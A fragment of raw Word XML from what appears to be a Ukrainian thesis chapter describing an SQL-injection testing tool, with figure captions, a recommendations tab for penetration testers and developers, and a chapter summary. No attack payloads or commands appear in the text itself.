        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5432BCF2" wp14:editId="291394F6">
            <wp:extent cx="6068923" cy="1486535"/>
            <wp:effectExtent l="19050" t="19050" r="27305" b="184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70291" cy="1486870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="357CC29F" w14:textId="0309A3DF" w:rsidR="00FC57FB" w:rsidRPr="00114204" w:rsidRDefault="00FC57FB" w:rsidP="00FC57FB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Рис 3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00114204">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00114204">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Час звичайного завантаження сайту</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548688A0" w14:textId="6C1E97FF" w:rsidR="00FC57FB" w:rsidRPr="00101F0F" w:rsidRDefault="00FC57FB" w:rsidP="00101F0F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB9F870" w14:textId="77777777" w:rsidR="00FC57FB" w:rsidRPr="004D0317" w:rsidRDefault="00FC57FB" w:rsidP="00FC57FB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="483443FC" w14:textId="43F69EA6" w:rsidR="00FC57FB" w:rsidRPr="00D84A48" w:rsidRDefault="00FC57FB" w:rsidP="00FC57FB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="142"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67311919" wp14:editId="7C424552">
            <wp:extent cx="6120130" cy="1340485"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="1206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1340485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1820ED92" w14:textId="33B1395A" w:rsidR="00FC57FB" w:rsidRPr="00022520" w:rsidRDefault="00FC57FB" w:rsidP="00FC57FB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Рис 3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4163">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Time</w:t>
      </w:r>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F1F7C1" w14:textId="6B22C7BE" w:rsidR="00101F0F" w:rsidRPr="00022520" w:rsidRDefault="00101F0F" w:rsidP="0098124E">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3055BF22" w14:textId="64923F9C" w:rsidR="00101F0F" w:rsidRPr="00022520" w:rsidRDefault="00101F0F" w:rsidP="00FC57FB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599F2FB8" w14:textId="77777777" w:rsidR="00101F0F" w:rsidRPr="00CE4163" w:rsidRDefault="00101F0F" w:rsidP="00FC57FB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60209EC7" w14:textId="105A6FC5" w:rsidR="00114204" w:rsidRPr="00114204" w:rsidRDefault="00114204" w:rsidP="00114204">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3387"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00114204">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>На рис. 3.12 представлені всі корисні навантаження, що використав сканер для отримання інформації</w:t>
      </w:r>
      <w:r w:rsidR="0098124E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6DB33F" w14:textId="77777777" w:rsidR="00114204" w:rsidRDefault="00114204" w:rsidP="00584480">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3387"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291071C7" w14:textId="7C866888" w:rsidR="00114204" w:rsidRDefault="00114204" w:rsidP="00A575E1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3387"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="358E24DB" wp14:editId="3787618B">
            <wp:extent cx="6120130" cy="1108710"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="152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1108710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B39AB23" w14:textId="468E60D2" w:rsidR="00114204" w:rsidRPr="00114204" w:rsidRDefault="00114204" w:rsidP="00114204">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Рис 3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00114204">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Корисні навантаження, що використовувалися сканером</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B653140" w14:textId="00CF8645" w:rsidR="00114204" w:rsidRPr="00101F0F" w:rsidRDefault="00114204" w:rsidP="00101F0F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3387"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD540F6" w14:textId="787E9003" w:rsidR="00516E88" w:rsidRDefault="00516E88" w:rsidP="00516E88">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_Toc30433161"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Описання третьої вкладки програми</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w14:paraId="2A67ACD1" w14:textId="77777777" w:rsidR="0098124E" w:rsidRPr="0098124E" w:rsidRDefault="0098124E" w:rsidP="0098124E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E374614" w14:textId="55C811E5" w:rsidR="00516E88" w:rsidRPr="00516E88" w:rsidRDefault="00516E88" w:rsidP="00516E88">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">За адресою </w:t>
      </w:r>
      <w:r w:rsidRPr="00516E88">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://127.0.0.1:8000/#recomendation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> розміщені</w:t>
      </w:r>
      <w:r w:rsidR="00C77A4D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> рекомендації рис. 3.13 </w:t>
      </w:r>
      <w:r w:rsidR="00C77A4D" w:rsidRPr="00C77A4D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>для фахівців з тестування на проникнення</w:t>
      </w:r>
      <w:r w:rsidR="00C77A4D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> та веб-розробників. Фахівці з тестування на проникнення можуть вставляти дані рекомендації в свої звіти для того щоб клієнт розумів, як найкращим чином виправити дану вразливість. Веб-розробники також можуть використовувати дану інформацію для покращення безпеки їхнього веб-додатку</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC74D47" w14:textId="0FC8F06E" w:rsidR="00516E88" w:rsidRDefault="00516E88" w:rsidP="00A575E1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1544"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="448DCBA4" wp14:editId="7D2B4849">
            <wp:extent cx="6120130" cy="2419350"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="190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2419350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB45519" w14:textId="1A3B0863" w:rsidR="00C77A4D" w:rsidRPr="00114204" w:rsidRDefault="00C77A4D" w:rsidP="00C77A4D">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004E2C98">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Рис 3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00114204">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">3 Меню рекомендацій </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D13980B" w14:textId="3E6B00DD" w:rsidR="00C77A4D" w:rsidRDefault="00C77A4D" w:rsidP="002934EF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A0CF20F" w14:textId="4181B3CD" w:rsidR="002934EF" w:rsidRDefault="002934EF" w:rsidP="002934EF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27DB9BF0" w14:textId="77777777" w:rsidR="002934EF" w:rsidRPr="002934EF" w:rsidRDefault="002934EF" w:rsidP="002934EF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="062025C8" w14:textId="1AB46E84" w:rsidR="00C77A4D" w:rsidRDefault="00C77A4D" w:rsidP="00C77A4D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc516752164"/>
      <w:bookmarkStart w:id="131" w:name="_Toc30433162"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00273246">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Висновки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidRPr="00273246">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>о розділу</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
    <w:p w14:paraId="170075A1" w14:textId="77777777" w:rsidR="00DB15F3" w:rsidRPr="00DB15F3" w:rsidRDefault="00DB15F3" w:rsidP="00DB15F3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F4E8E8" w14:textId="7B81C83F" w:rsidR="0072630A" w:rsidRDefault="0072630A" w:rsidP="0072630A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0072630A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">В даній частині було розглянуто програмний продукт, що містить у собі 3 пункти меню. В першому пункті </w:t>
      </w:r>
      <w:r w:rsidRPr="0072630A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">розміщені таблиці, які допомагають при ручному тестуванні отримати дані з таких баз даних як: </w:t>
      </w:r>
      <w:r w:rsidRPr="0072630A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r w:rsidRPr="0072630A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0072630A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="0072630A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="0072630A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0072630A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> і </w:t>
      </w:r>
      <w:r w:rsidRPr="0072630A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0072630A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. В другому пункті меню була розглянута робота сканера, який виявляє 4 різні класи </w:t>
      </w:r>
      <w:r w:rsidRPr="0072630A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="0072630A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. В третьому пункті меню розміщені рекомендації, які пояснюють чому додаток вразливий до </w:t>
      </w:r>
      <w:r w:rsidRPr="0072630A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="0072630A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">-ін’єкції і які заходи безпеки потрібно вжити, щоб усунути дану проблему. Даний </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>інструмент допоможе створювати більш безпечні веб-додатки і веб-сайти, а також допоможе фахівцям з тестування на проникнення проводити тестування баз даних в більш зручніше.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEC13B2" w14:textId="3D288C57" w:rsidR="0072630A" w:rsidRDefault="0072630A" w:rsidP="0072630A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579CC91C" w14:textId="77777777" w:rsidR="0072630A" w:rsidRDefault="0072630A">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A67C256" w14:textId="77777777" w:rsidR="0072630A" w:rsidRPr="00273246" w:rsidRDefault="0072630A" w:rsidP="0072630A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
